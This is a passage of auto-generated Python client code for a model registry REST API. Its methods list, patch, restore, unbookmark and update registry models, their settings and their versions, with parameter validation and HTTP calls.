def list_model_versions(self, owner, name, **kwargs): # noqa: E501
"""List model versions # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_model_versions(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Entity managing the resource (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param str mode: Mode the search.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ListModelVersionsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_model_versions_with_http_info(owner, name, **kwargs) # noqa: E501
def list_model_versions_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""List model versions # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_model_versions_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Entity managing the resource (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param str mode: Mode the search.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ListModelVersionsResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name',
'offset',
'limit',
'sort',
'query',
'mode'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_model_versions" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `list_model_versions`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `list_model_versions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'query' in local_var_params and local_var_params['query'] is not None: # noqa: E501
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'mode' in local_var_params and local_var_params['mode'] is not None: # noqa: E501
query_params.append(('mode', local_var_params['mode'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{name}/versions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ListModelVersionsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_model_registry(self, owner, model_name, body, **kwargs): # noqa: E501
"""Patch registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_model_registry(owner, model_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model_name: Optional component name, should be a valid fully qualified value: name[:version] (required)
:param V1ModelRegistry body: Model body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelRegistry
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_model_registry_with_http_info(owner, model_name, body, **kwargs) # noqa: E501
def patch_model_registry_with_http_info(self, owner, model_name, body, **kwargs): # noqa: E501
"""Patch registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_model_registry_with_http_info(owner, model_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model_name: Optional component name, should be a valid fully qualified value: name[:version] (required)
:param V1ModelRegistry body: Model body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelRegistry, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'model_name',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_model_registry" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `patch_model_registry`") # noqa: E501
# verify the required parameter 'model_name' is set
if self.api_client.client_side_validation and ('model_name' not in local_var_params or # noqa: E501
local_var_params['model_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `model_name` when calling `patch_model_registry`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_model_registry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'model_name' in local_var_params:
path_params['model.name'] = local_var_params['model_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{model.name}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelRegistry', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_model_registry_settings(self, owner, model, body, **kwargs): # noqa: E501
"""Patch registry model settings # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_model_registry_settings(owner, model, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model: Model name (required)
:param V1ModelRegistrySettings body: Model settings body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelRegistrySettings
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_model_registry_settings_with_http_info(owner, model, body, **kwargs) # noqa: E501
def patch_model_registry_settings_with_http_info(self, owner, model, body, **kwargs): # noqa: E501
"""Patch registry model settings # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_model_registry_settings_with_http_info(owner, model, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model: Model name (required)
:param V1ModelRegistrySettings body: Model settings body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelRegistrySettings, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'model',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_model_registry_settings" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `patch_model_registry_settings`") # noqa: E501
# verify the required parameter 'model' is set
if self.api_client.client_side_validation and ('model' not in local_var_params or # noqa: E501
local_var_params['model'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `model` when calling `patch_model_registry_settings`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_model_registry_settings`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'model' in local_var_params:
path_params['model'] = local_var_params['model'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{model}/settings', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelRegistrySettings', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_model_version(self, owner, model, version_name, body, **kwargs): # noqa: E501
"""Patch model version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_model_version(owner, model, version_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model: Model name (required)
:param str version_name: Optional component name, should be a valid fully qualified value: name[:version] (required)
:param V1ModelVersion body: Model version body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelVersion
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_model_version_with_http_info(owner, model, version_name, body, **kwargs) # noqa: E501
def patch_model_version_with_http_info(self, owner, model, version_name, body, **kwargs): # noqa: E501
"""Patch model version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_model_version_with_http_info(owner, model, version_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model: Model name (required)
:param str version_name: Optional component name, should be a valid fully qualified value: name[:version] (required)
:param V1ModelVersion body: Model version body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelVersion, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'model',
'version_name',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_model_version" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `patch_model_version`") # noqa: E501
# verify the required parameter 'model' is set
if self.api_client.client_side_validation and ('model' not in local_var_params or # noqa: E501
local_var_params['model'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `model` when calling `patch_model_version`") # noqa: E501
# verify the required parameter 'version_name' is set
if self.api_client.client_side_validation and ('version_name' not in local_var_params or # noqa: E501
local_var_params['version_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `version_name` when calling `patch_model_version`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_model_version`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'model' in local_var_params:
path_params['model'] = local_var_params['model'] # noqa: E501
if 'version_name' in local_var_params:
path_params['version.name'] = local_var_params['version_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{model}/versions/{version.name}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelVersion', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def restore_model_registry(self, owner, name, **kwargs): # noqa: E501
"""Restore registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.restore_model_registry(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namesapce (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.restore_model_registry_with_http_info(owner, name, **kwargs) # noqa: E501
def restore_model_registry_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""Restore registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.restore_model_registry_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namesapce (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method restore_model_registry" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `restore_model_registry`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `restore_model_registry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{name}/restore', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def unbookmark_model_registry(self, owner, name, **kwargs): # noqa: E501
"""Unbookmark registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unbookmark_model_registry(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namesapce (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.unbookmark_model_registry_with_http_info(owner, name, **kwargs) # noqa: E501
def unbookmark_model_registry_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""Unbookmark registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unbookmark_model_registry_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namesapce (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method unbookmark_model_registry" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `unbookmark_model_registry`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `unbookmark_model_registry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{name}/unbookmark', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_model_registry(self, owner, model_name, body, **kwargs): # noqa: E501
"""Update registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_model_registry(owner, model_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model_name: Optional component name, should be a valid fully qualified value: name[:version] (required)
:param V1ModelRegistry body: Model body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelRegistry
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_model_registry_with_http_info(owner, model_name, body, **kwargs) # noqa: E501
def update_model_registry_with_http_info(self, owner, model_name, body, **kwargs): # noqa: E501
"""Update registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_model_registry_with_http_info(owner, model_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model_name: Optional component name, should be a valid fully qualified value: name[:version] (required)
:param V1ModelRegistry body: Model body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelRegistry, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'model_name',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_model_registry" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `update_model_registry`") # noqa: E501
# verify the required parameter 'model_name' is set
if self.api_client.client_side_validation and ('model_name' not in local_var_params or # noqa: E501
local_var_params['model_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `model_name` when calling `update_model_registry`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `update_model_registry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'model_name' in local_var_params:
path_params['model.name'] = local_var_params['model_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{model.name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelRegistry', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_model_registry_settings(self, owner, model, body, **kwargs): # noqa: E501
"""Update registry model settings # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_model_registry_settings(owner, model, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model: Model name (required)
:param V1ModelRegistrySettings body: Model settings body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelRegistrySettings
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_model_registry_settings_with_http_info(owner, model, body, **kwargs) # noqa: E501
def update_model_registry_settings_with_http_info(self, owner, model, body, **kwargs): # noqa: E501
"""Update registry model settings # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_model_registry_settings_with_http_info(owner, model, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model: Model name (required)
:param V1ModelRegistrySettings body: Model settings body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelRegistrySettings, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'model',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_model_registry_settings" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `update_model_registry_settings`") # noqa: E501
# verify the required parameter 'model' is set
if self.api_client.client_side_validation and ('model' not in local_var_params or # noqa: E501
local_var_params['model'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `model` when calling `update_model_registry_settings`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `update_model_registry_settings`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'model' in local_var_params:
path_params['model'] = local_var_params['model'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{model}/settings', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelRegistrySettings', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_model_version(self, owner, model, version_name, body, **kwargs): # noqa: E501
"""Update model version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_model_version(owner, model, version_name, body, async_req=True)
